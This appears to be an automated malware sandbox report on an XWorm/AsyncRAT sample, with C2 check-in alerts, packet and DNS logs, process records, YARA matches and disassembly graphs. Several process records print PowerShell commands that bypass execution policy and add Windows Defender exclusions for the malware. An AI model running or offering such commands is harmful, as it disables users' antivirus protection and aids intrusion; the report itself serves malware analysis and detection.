                                                                2024-11-23T20:57:08.789804+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes145.141.26.1707000192.168.2.449738TCP
                                                                2024-11-23T20:57:08.790805+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.44973845.141.26.1707000TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 23, 2024 20:55:01.789154053 CET4973080192.168.2.4208.95.112.1
                                                                Nov 23, 2024 20:55:01.916055918 CET8049730208.95.112.1192.168.2.4
                                                                Nov 23, 2024 20:55:01.916155100 CET4973080192.168.2.4208.95.112.1
                                                                Nov 23, 2024 20:55:01.917303085 CET4973080192.168.2.4208.95.112.1
                                                                Nov 23, 2024 20:55:02.039004087 CET8049730208.95.112.1192.168.2.4
                                                                Nov 23, 2024 20:55:03.061079979 CET8049730208.95.112.1192.168.2.4
                                                                Nov 23, 2024 20:55:03.111433983 CET4973080192.168.2.4208.95.112.1
                                                                Nov 23, 2024 20:55:55.854644060 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:55:55.977458954 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:55:55.977574110 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:55:56.032727957 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:55:56.157277107 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:55:58.346637964 CET8049730208.95.112.1192.168.2.4
                                                                Nov 23, 2024 20:55:58.346708059 CET4973080192.168.2.4208.95.112.1
                                                                Nov 23, 2024 20:56:06.689975977 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:06.736720085 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:07.443100929 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:07.563496113 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:08.027931929 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:08.087874889 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:08.091499090 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:08.211173058 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:18.862524986 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:18.982467890 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:19.446957111 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:19.448823929 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:19.570760965 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:30.285281897 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:30.404866934 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:30.886734962 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:30.891652107 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:31.013333082 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:36.678509951 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:36.721043110 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:41.705862999 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:41.826405048 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:42.292239904 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:42.296448946 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:42.422864914 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:43.081775904 CET4973080192.168.2.4208.95.112.1
                                                                Nov 23, 2024 20:56:43.235579014 CET8049730208.95.112.1192.168.2.4
                                                                Nov 23, 2024 20:56:53.127747059 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:53.247493982 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:53.715116978 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:56:53.717446089 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:56:53.837203979 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:00.330722094 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:57:00.451127052 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:00.915702105 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:00.938069105 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:57:01.058618069 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:06.709253073 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:06.752327919 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:57:08.205930948 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:57:08.325592041 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:08.789803982 CET70004973845.141.26.170192.168.2.4
                                                                Nov 23, 2024 20:57:08.790805101 CET497387000192.168.2.445.141.26.170
                                                                Nov 23, 2024 20:57:08.912101984 CET70004973845.141.26.170192.168.2.4

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Nov 23, 2024 20:55:01.631128073 CET5339053192.168.2.41.1.1.1
                                                                Nov 23, 2024 20:55:01.781498909 CET53533901.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Nov 23, 2024 20:55:01.631128073 CET192.168.2.41.1.1.10xb4ecStandard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Nov 23, 2024 20:55:01.781498909 CET1.1.1.1192.168.2.40xb4ecNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • ip-api.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449730208.95.112.1807396C:\Users\user\Desktop\18fvs4AVae.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 23, 2024 20:55:01.917303085 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Nov 23, 2024 20:55:03.061079979 CET175INHTTP/1.1 200 OK
                                                                Date: Sat, 23 Nov 2024 19:55:02 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 6
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                                Data Raw: 66 61 6c 73 65 0a
                                                                Data Ascii: false


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:14:54:57
                                                                Start date:23/11/2024
                                                                Path:C:\Users\user\Desktop\18fvs4AVae.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\18fvs4AVae.exe"
                                                                Imagebase:0x480000
                                                                File size:51'200 bytes
                                                                MD5 hash:59A9510540FEC35043B990DEB270B139
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2946825942.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:1
                                                                Start time:14:55:02
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:14:55:02
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:14:55:09
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:14:55:09
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:14:55:19
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:10
                                                                Start time:14:55:19
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:14:55:33
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:14:55:33
                                                                Start date:23/11/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:20.2%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:15%
                                                                  Total number of Nodes:20
                                                                  Total number of Limit Nodes:1
                                                                  execution_graph 6008 7ffd9b8983b5 6009 7ffd9b898361 6008->6009 6011 7ffd9b8983c6 SetWindowsHookExW 6008->6011 6012 7ffd9b899031 6011->6012 5992 7ffd9b898dad 5993 7ffd9b898dbf 5992->5993 5996 7ffd9b8983c0 5993->5996 5995 7ffd9b898dfb 5997 7ffd9b8983c9 SetWindowsHookExW 5996->5997 5999 7ffd9b899031 5997->5999 5999->5995 6000 7ffd9b89892d 6001 7ffd9b89895e 6000->6001 6002 7ffd9b898a92 RtlSetProcessIsCritical 6001->6002 6003 7ffd9b898af2 6002->6003 6004 7ffd9b896e61 6005 7ffd9b896e7f CheckRemoteDebuggerPresent 6004->6005 6007 7ffd9b896f1f 6005->6007 6013 7ffd9b898e61 6014 7ffd9b898e67 SetWindowsHookExW 6013->6014 6016 7ffd9b899031 6014->6016

                                                                  Executed Functions

                                                                  Function 00007FFD9B899420 Relevance: 2.4, Strings: 1, Instructions: 1146COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 7ffd9b899420-7ffd9b89d783 2 7ffd9b89d785-7ffd9b89d790 call 7ffd9b890640 0->2 3 7ffd9b89d7cd-7ffd9b89d7e0 0->3 7 7ffd9b89d795-7ffd9b89d7ca 2->7 5 7ffd9b89d856 3->5 6 7ffd9b89d7e2-7ffd9b89d7ff 3->6 8 7ffd9b89d85b-7ffd9b89d870 5->8 6->8 11 7ffd9b89d801-7ffd9b89d851 call 7ffd9b89b4e0 6->11 7->3 15 7ffd9b89d88e-7ffd9b89d8a3 8->15 16 7ffd9b89d872-7ffd9b89d889 call 7ffd9b890830 call 7ffd9b890650 8->16 36 7ffd9b89e438-7ffd9b89e446 11->36 23 7ffd9b89d8a5-7ffd9b89d8d5 call 7ffd9b890830 15->23 24 7ffd9b89d8da-7ffd9b89d8ef 15->24 16->36 23->36 32 7ffd9b89d902-7ffd9b89d917 24->32 33 7ffd9b89d8f1-7ffd9b89d8fd call 7ffd9b89ace8 24->33 41 7ffd9b89d919-7ffd9b89d91c 32->41 42 7ffd9b89d95d-7ffd9b89d972 32->42 33->36 41->5 44 7ffd9b89d922-7ffd9b89d92d 41->44 48 7ffd9b89d974-7ffd9b89d977 42->48 49 7ffd9b89d9b3-7ffd9b89d9c8 42->49 44->5 47 7ffd9b89d933-7ffd9b89d958 call 7ffd9b890628 call 7ffd9b89ace8 44->47 47->36 48->5 50 7ffd9b89d97d-7ffd9b89d988 48->50 56 7ffd9b89d9f5-7ffd9b89da0a 49->56 57 7ffd9b89d9ca-7ffd9b89d9cd 49->57 50->5 54 7ffd9b89d98e-7ffd9b89d9ae call 7ffd9b890628 call 7ffd9b899470 50->54 54->36 66 7ffd9b89da10-7ffd9b89da5c call 7ffd9b8905b0 56->66 67 7ffd9b89dae2-7ffd9b89daf7 56->67 57->5 59 7ffd9b89d9d3-7ffd9b89d9f0 call 7ffd9b890628 call 7ffd9b899478 57->59 59->36 66->5 100 7ffd9b89da62-7ffd9b89da9a call 7ffd9b892490 66->100 75 7ffd9b89db16-7ffd9b89db2b 67->75 76 7ffd9b89daf9-7ffd9b89dafc 67->76 84 7ffd9b89db4d-7ffd9b89db62 75->84 85 7ffd9b89db2d-7ffd9b89db30 75->85 76->5 79 7ffd9b89db02-7ffd9b89db11 call 7ffd9b899450 76->79 79->36 91 7ffd9b89db82-7ffd9b89db97 84->91 92 7ffd9b89db64-7ffd9b89db7d 84->92 85->5 86 7ffd9b89db36-7ffd9b89db48 call 7ffd9b899450 85->86 86->36 97 7ffd9b89dbb7-7ffd9b89dbcc 91->97 98 7ffd9b89db99-7ffd9b89dbb2 91->98 92->36 103 7ffd9b89dbec-7ffd9b89dc01 97->103 104 7ffd9b89dbce-7ffd9b89dbe7 97->104 98->36 100->5 117 7ffd9b89daa0-7ffd9b89dadd call 7ffd9b89acf8 100->117 110 7ffd9b89dc2a-7ffd9b89dc3f 103->110 111 7ffd9b89dc03-7ffd9b89dc06 103->111 104->36 118 7ffd9b89dc45-7ffd9b89dcbd 110->118 119 7ffd9b89dcdf-7ffd9b89dcf4 110->119 111->5 113 7ffd9b89dc0c-7ffd9b89dc25 111->113 113->36 117->36 118->5 146 7ffd9b89dcc3-7ffd9b89dcda 118->146 125 7ffd9b89dcf6-7ffd9b89dd07 119->125 126 7ffd9b89dd0c-7ffd9b89dd21 119->126 125->36 133 7ffd9b89dd27-7ffd9b89dd40 126->133 134 7ffd9b89ddc1-7ffd9b89ddd6 126->134 133->134 140 7ffd9b89ddd8-7ffd9b89dde9 134->140 141 7ffd9b89ddee-7ffd9b89de03 134->141 140->36 147 7ffd9b89de05-7ffd9b89de3f call 7ffd9b890af0 call 7ffd9b89b4e0 141->147 148 7ffd9b89de44-7ffd9b89de59 141->148 146->36 147->36 152 7ffd9b89df00-7ffd9b89df15 148->152 153 7ffd9b89de5f-7ffd9b89defb call 7ffd9b890af0 call 7ffd9b89b4e0 148->153 159 7ffd9b89df1b-7ffd9b89df1e 152->159 160 7ffd9b89dfa3-7ffd9b89dfb8 152->160 153->36 161 7ffd9b89df98-7ffd9b89df9d 159->161 162 7ffd9b89df20-7ffd9b89df2b 159->162 169 7ffd9b89dfba-7ffd9b89dfc7 call 7ffd9b89b4e0 160->169 170 7ffd9b89dfcc-7ffd9b89dfe1 160->170 176 7ffd9b89df9e 161->176 162->161 165 7ffd9b89df2d-7ffd9b89df96 call 7ffd9b890af0 call 7ffd9b89b4e0 162->165 165->176 169->36 180 7ffd9b89e022-7ffd9b89e037 170->180 181 7ffd9b89dfe3-7ffd9b89e01d call 7ffd9b890af0 call 7ffd9b89b4e0 170->181 176->36 188 7ffd9b89e03d-7ffd9b89e04e 180->188 189 7ffd9b89e0c2-7ffd9b89e0d7 180->189 181->36 188->5 198 7ffd9b89e054-7ffd9b89e064 call 7ffd9b890620 188->198 200 7ffd9b89e117-7ffd9b89e12c 189->200 201 7ffd9b89e0d9-7ffd9b89e0dc 189->201 209 7ffd9b89e066-7ffd9b89e09b call 7ffd9b89b4e0 198->209 210 7ffd9b89e0a0-7ffd9b89e0bd call 7ffd9b890620 call 7ffd9b890628 call 7ffd9b899428 198->210 211 7ffd9b89e12e-7ffd9b89e16d call 7ffd9b89b1a0 call 7ffd9b89b9d8 call 7ffd9b899430 200->211 212 7ffd9b89e172-7ffd9b89e187 200->212 201->5 204 7ffd9b89e0e2-7ffd9b89e112 call 7ffd9b890618 call 7ffd9b890628 call 7ffd9b899428 201->204 204->36 209->36 210->36 211->36 230 7ffd9b89e189-7ffd9b89e1ec call 7ffd9b890af0 call 7ffd9b89b4e0 212->230 231 7ffd9b89e1f1-7ffd9b89e206 212->231 230->36 231->36 248 7ffd9b89e20c-7ffd9b89e213 231->248 254 7ffd9b89e226-7ffd9b89e340 call 7ffd9b89ad18 call 7ffd9b89ad28 call 7ffd9b89ad38 call 7ffd9b89ad48 call 7ffd9b897b80 call 7ffd9b89ad58 call 7ffd9b89ad28 call 7ffd9b89ad38 248->254 255 7ffd9b89e215-7ffd9b89e21f call 7ffd9b89ad08 248->255 290 7ffd9b89e342-7ffd9b89e346 254->290 291 7ffd9b89e3b1-7ffd9b89e3c6 call 7ffd9b890af0 254->291 255->254 293 7ffd9b89e348-7ffd9b89e3a7 call 7ffd9b89ad68 call 7ffd9b89ad78 290->293 294 7ffd9b89e3c7-7ffd9b89e437 call 7ffd9b890630 call 7ffd9b89b4e0 290->294 291->294 293->291 294->36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID: 0-3916222277
                                                                  • Opcode ID: 87068ca955b933b1960782510d424fb1bb1573d26e4e31367c3e9e5353f6dea3
                                                                  • Instruction ID: b5d756bdb760430f51d56913e479bd1d5a2425a2c6b69e6001d7bed972d286ee
                                                                  • Opcode Fuzzy Hash: 87068ca955b933b1960782510d424fb1bb1573d26e4e31367c3e9e5353f6dea3
                                                                  • Instruction Fuzzy Hash: E472A130B1D90E4FEFA8E7788466AB976E2EF9C304B510579D41EC32D6DE38AC428745
                                                                  Function 00007FFD9B890610 Relevance: 2.0, Strings: 1, Instructions: 764COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 317 7ffd9b890610-7ffd9b890cdf 325 7ffd9b890ce8-7ffd9b890cec 317->325 326 7ffd9b890ce1-7ffd9b890ce6 317->326 327 7ffd9b890cef-7ffd9b890d09 325->327 326->327 329 7ffd9b890d0b-7ffd9b890d3d 327->329 330 7ffd9b890d43-7ffd9b890d89 327->330 337 7ffd9b890d8a-7ffd9b890dd0 329->337 338 7ffd9b890d3f-7ffd9b890d41 329->338 343 7ffd9b890dd6-7ffd9b890f05 call 7ffd9b890538 * 8 call 7ffd9b890648 337->343 344 7ffd9b89140a-7ffd9b891451 337->344 338->329 338->330 385 7ffd9b890f07-7ffd9b890f0e 343->385 386 7ffd9b890f0f-7ffd9b890f77 call 7ffd9b8904b8 call 7ffd9b8904b0 call 7ffd9b890358 call 7ffd9b890368 343->386 385->386 400 7ffd9b890f78-7ffd9b890f86 386->400 402 7ffd9b890f88-7ffd9b890f92 400->402 403 7ffd9b890f99-7ffd9b890fa9 400->403 402->403 406 7ffd9b890fab-7ffd9b890fb6 403->406 407 7ffd9b890fd1-7ffd9b890ff1 403->407 406->400 409 7ffd9b890fb8-7ffd9b890fca call 7ffd9b890358 406->409 414 7ffd9b891002-7ffd9b8910e4 407->414 415 7ffd9b890ff3-7ffd9b890ffd call 7ffd9b890378 407->415 409->407 429 7ffd9b8910e6-7ffd9b8910fb 414->429 430 7ffd9b891132-7ffd9b891165 414->430 415->414 429->430 437 7ffd9b891167-7ffd9b891188 430->437 438 7ffd9b89118a-7ffd9b8911ba 430->438 440 7ffd9b8911c2-7ffd9b8911f9 437->440 438->440 445 7ffd9b8911fb-7ffd9b89121c 440->445 446 7ffd9b89121e-7ffd9b89124e 440->446 448 7ffd9b891256-7ffd9b891338 call 7ffd9b890388 call 7ffd9b8905e8 call 7ffd9b890788 445->448 446->448 466 7ffd9b89133a call 7ffd9b890828 448->466 467 7ffd9b89133f-7ffd9b89134a 448->467 466->467 470 7ffd9b89134c-7ffd9b891356 467->470 471 7ffd9b89135d-7ffd9b8913ea 467->471 470->471 481 7ffd9b8913f1-7ffd9b891409 471->481
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CAN_^
                                                                  • API String ID: 0-3098826533
                                                                  • Opcode ID: 1f5c3204728a7085af0497fb587f5fd162d9ecccd90aaa359e4778270691b8d5
                                                                  • Instruction ID: ed1dd52b3f317632086f7f7c765a0cd0b9e4f016c4218ed35693148f18217ccf
                                                                  • Opcode Fuzzy Hash: 1f5c3204728a7085af0497fb587f5fd162d9ecccd90aaa359e4778270691b8d5
                                                                  • Instruction Fuzzy Hash: F3321A21B2DA494FEB98FB7898696B97BD1FF9C304F40057DE44EC32D6DD28A9018341
                                                                  Function 00007FFD9B896E61 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: CheckDebuggerPresentRemote
                                                                  • String ID:
                                                                  • API String ID: 3662101638-0
                                                                  • Opcode ID: 9b2d0eeb564d9d31ad838737307bdbf0b45fcd96cffad13fbf8a4607500c2426
                                                                  • Instruction ID: 993561481d268376b671e3803bb0e5f93bc170e0f5044a5fb549e7cc8989a667
                                                                  • Opcode Fuzzy Hash: 9b2d0eeb564d9d31ad838737307bdbf0b45fcd96cffad13fbf8a4607500c2426
                                                                  • Instruction Fuzzy Hash: 9051213090D78C8FCB55DB6888556E97FF0FF5A320F0902ABD499C7192DA38A946CB81
                                                                  Function 00007FFD9B8958B6 Relevance: .5, Instructions: 466COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 807 7ffd9b8958b6-7ffd9b8958c3 808 7ffd9b8958c5-7ffd9b8958cd 807->808 809 7ffd9b8958ce-7ffd9b895997 807->809 808->809 813 7ffd9b895999-7ffd9b8959a2 809->813 814 7ffd9b895a03 809->814 813->814 815 7ffd9b8959a4-7ffd9b8959b0 813->815 816 7ffd9b895a05-7ffd9b895a2a 814->816 817 7ffd9b8959e9-7ffd9b895a01 815->817 818 7ffd9b8959b2-7ffd9b8959c4 815->818 822 7ffd9b895a96 816->822 823 7ffd9b895a2c-7ffd9b895a35 816->823 817->816 820 7ffd9b8959c6 818->820 821 7ffd9b8959c8-7ffd9b8959db 818->821 820->821 821->821 824 7ffd9b8959dd-7ffd9b8959e5 821->824 826 7ffd9b895a98-7ffd9b895b40 822->826 823->822 825 7ffd9b895a37-7ffd9b895a43 823->825 824->817 827 7ffd9b895a45-7ffd9b895a57 825->827 828 7ffd9b895a7c-7ffd9b895a94 825->828 837 7ffd9b895bae 826->837 838 7ffd9b895b42-7ffd9b895b4c 826->838 829 7ffd9b895a59 827->829 830 7ffd9b895a5b-7ffd9b895a6e 827->830 828->826 829->830 830->830 832 7ffd9b895a70-7ffd9b895a78 830->832 832->828 840 7ffd9b895bb0-7ffd9b895bd9 837->840 838->837 839 7ffd9b895b4e-7ffd9b895b5b 838->839 841 7ffd9b895b5d-7ffd9b895b6f 839->841 842 7ffd9b895b94-7ffd9b895bac 839->842 847 7ffd9b895bdb-7ffd9b895be6 840->847 848 7ffd9b895c43 840->848 843 7ffd9b895b71 841->843 844 7ffd9b895b73-7ffd9b895b86 841->844 842->840 843->844 844->844 846 7ffd9b895b88-7ffd9b895b90 844->846 846->842 847->848 850 7ffd9b895be8-7ffd9b895bf6 847->850 849 7ffd9b895c45-7ffd9b895cd6 848->849 858 7ffd9b895cdc-7ffd9b895ceb 849->858 851 7ffd9b895bf8-7ffd9b895c0a 850->851 852 7ffd9b895c2f-7ffd9b895c41 850->852 853 7ffd9b895c0c 851->853 854 7ffd9b895c0e-7ffd9b895c21 851->854 852->849 853->854 854->854 856 7ffd9b895c23-7ffd9b895c2b 854->856 856->852 859 7ffd9b895ced 858->859 860 7ffd9b895cf3-7ffd9b895d58 call 7ffd9b895d74 858->860 859->860 867 7ffd9b895d5a 860->867 868 7ffd9b895d5f-7ffd9b895d72 860->868 867->868
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 14924c2f1912e27642513646cbf9d3c3e0b8d427a23af0ec761c959f70b2d2df
                                                                  • Instruction ID: 810a7e5229007d20f7e47c68654406da0efe4b34e58e010f28dafa70c03f9eff
                                                                  • Opcode Fuzzy Hash: 14924c2f1912e27642513646cbf9d3c3e0b8d427a23af0ec761c959f70b2d2df
                                                                  • Instruction Fuzzy Hash: 57F1B630A09B8D8FEFA8DF28D8657E97BD1FF58310F04426AE85DC7295CB3499418B81
